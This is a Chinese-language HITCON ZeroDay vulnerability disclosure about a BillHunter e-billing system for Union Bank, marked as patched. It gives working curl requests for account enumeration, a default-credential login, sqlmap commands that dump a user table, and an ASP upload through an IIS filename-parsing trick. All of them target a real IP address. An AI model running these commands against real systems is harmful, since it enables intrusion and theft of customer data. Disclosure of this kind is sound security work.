BillHunter 系統 聯邦銀行電子帳單多個漏洞導致 getshell - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00023
  • Vendor: 聯邦網通科技股份有限公司
  • Title: BillHunter 系統 聯邦銀行電子帳單多個漏洞導致 getshell
  • Introduction: BillHunter 系統存在大量弱點且暴露在公網上, 可進一步執行內網滲透

處理狀態

目前狀態

公開
Last Update : 2016/03/09
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2016/01/28 15:59:54 : 新提交 (由 [email protected] 更新此狀態)
  • 2016/02/01 02:53:13 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/02 16:26:46 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/02 16:26:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/02 16:41:39 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/28 22:42:32 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/03/05 16:36:24 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/03/05 16:36:31 : 複審中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/03/09 02:19:21 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00023
  • 通報者:chris ([email protected])
  • 風險:嚴重
  • 類型:疑似遭入侵 (Probably Hacked)

參考資料

伺服器疑似遭到入侵,例如頁面遭植入惡意程式、置換頁面等。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

敘述

1 帳號列舉

漏洞位置: 登入頁面

網頁請求:
POST /index.asp HTTP/1.1
Host: 61.219.193.138
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Connection: close

username=THIS_IS_A_NONE_EXIST_USERNAME&password=&check=1

網頁回應:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Jan 2016 06:21:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 1308
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDCQDT=KIIFAHNALAPONOKJAAPAOLDI; path=/
Cache-control: private

<script language=javascript>var text;
text = new String("* 無此帳號\n");
alert(text)</script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<下略>

測試語法:
curl -d "username=test&password=&check=1" "http://61.219.193.138/index.asp" | iconv -f "big5" -t "utf-8"
curl -d "username=THIS_IS_A_NONE_EXIST_USERNAME&password=&check=1" "http://61.219.193.138/index.asp" | iconv -f "big5" -t "utf-8"

2 暴力破解

漏洞位置: 登入頁面

網頁請求:
POST /index.asp HTTP/1.1
Host: 61.219.193.138
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Connection: close

username=Operator&password=Operator&check=1

網頁回應:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Jan 2016 07:04:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 501
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDCQDT=BBNGAHNAIJGDNODNBCPCGPGF; path=/
Cache-control: private

<html>
<head>
<title>index</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
</head>
<frameset rows="96,,32" frameborder="NO" border="0" framespacing="0" cols="">
<frame src="top.htm" scrolling="NO" name="top" frameborder="NO" noresize>
<frame name="topFrame" scrolling="YES" src="main.htm" >
<frame name="mainFrame" src="down.asp" scrolling="NO" noresize>
</frameset>
<noframes>
<body bgcolor="#FFFFFF" text="#000000">
</body>
</noframes>
</html>

測試語法:
curl -d "username=Operator&password=Operator&check=1" "http://61.219.193.138/index.asp" | iconv -f "big5" -t "utf-8"
curl -d "username=admin&password=123456&check=1" "http://61.219.193.138/index.asp" | iconv -f "big5" -t "utf-8"

3 隱碼攻擊

漏洞位置: 首頁 > 行銷輔助系統 > 聯邦電子帳單 > 預覽

網頁請求:
GET /Marking_ADPreview.asp?Bill_No=3'&Card_ID=A HTTP/1.1
Host: 61.219.193.138
Connection: close

網頁回應:
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 28 Jan 2016 07:12:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 628
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDCQDT=KBNGAHNAICFINMPMDJECGNFN; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>b</title>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
</head>
<body bgcolor="#CCCCCC">
<font face="Arial, 新細明體, 細明體,MingliU" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font>
<font face="Arial,新細明體,細明體,MingLiU" size=2 >~ '80040e14'</font>
<p>
<font face="Arial, 新細明體,細明體, MingliU" size=2>|字元字串 '' 前面的引號。</font>
<p>
<font face="Arial, 新細明體,細明體, MingliU" size=2>/Marking_ADPreview.asp</font>
<font face="Arial,新細明體,細明體,MingLiU" size=2>, 列22</font>

測試語法:
sqlmap -u "http://61.219.193.138/Marking_ADPreview.asp?Bill_No=3&Card_ID=A" -p "Bill_No" -o -v 0 --flush-session --random-agent --threads 10 --banner --current-db --current-user --is-dba
sqlmap -u "http://61.219.193.138/Marking_ADPreview.asp?Bill_No=3&Card_ID=A" -p "Bill_No" -o -v 0 -D "billhunter" -T "user_data" --dump --start 1 --stop 5

4 解析漏洞

漏洞位置: 首頁 > 行銷輔助系統 > 圖檔管理 > 上傳圖檔

網頁請求:
POST /setdemo_upload_photo.asp HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------7e03a1cd019c
Host: 61.219.193.138
Content-Length: 693
Connection: close
Cookie: ASPSESSIONIDCQDDCQDT=BJPGAHNAPPNDLDNMIMNIPCJE

-----------------------------7e03a1cd019c
Content-Disposition: form-data; name="photo_name"

test
-----------------------------7e03a1cd019c
Content-Disposition: form-data; name="User_ID"

1
-----------------------------7e03a1cd019c
Content-Disposition: form-data; name="photo_type"

1
-----------------------------7e03a1cd019c
Content-Disposition: form-data; name="file"; filename="C:\Documents and Settings\Chris\Desktop\GG.asp;.png"
Content-Type: text/plain

Ooooooooooooooops, it's working :P

<%=now()%>
-----------------------------7e03a1cd019c
Content-Disposition: form-data; name="photo_remark"

a bad file testing here
-----------------------------7e03a1cd019c--

網頁回應:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Jan 2016 07:36:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 288
Content-Type: text/html
Cache-control: private

<script language=javascript>var text;
text = new String("上傳圖檔成功");
alert(text);
location.href = "setdemo_photo_show.asp?order_photo_date=true"</script>
<!-- Start CheckData -->
<!-- End CheckData -->

測試語法:
http://61.219.193.138/Billhunter_a/Uploaded_Photo/2016128153649GG.asp;.png

擷圖

留言討論

;